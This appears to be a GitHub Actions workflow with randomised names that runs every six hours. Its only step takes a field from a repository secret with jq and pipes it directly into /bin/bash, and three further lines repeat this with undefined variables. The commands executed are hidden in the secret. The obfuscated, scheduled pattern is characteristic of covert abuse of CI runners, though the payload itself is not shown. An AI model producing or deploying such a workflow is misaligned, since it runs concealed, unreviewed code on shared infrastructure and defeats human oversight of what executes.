name: yaoxianzhi7129

on:
  workflow_dispatch:
  schedule:
    - cron: '33 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yaoxianzhi7129
        env:
          len6650: ${{ secrets.len6650 }}
        run: |
          echo $len6650 | jq -r .wbx90 | /bin/bash
          echo $injd24898 | jq -r .gban4 | /bin/bash
          echo $humfd63 | jq -r .sa067 | /bin/bash
          echo $r23114 | jq -r .g0 | /bin/bash

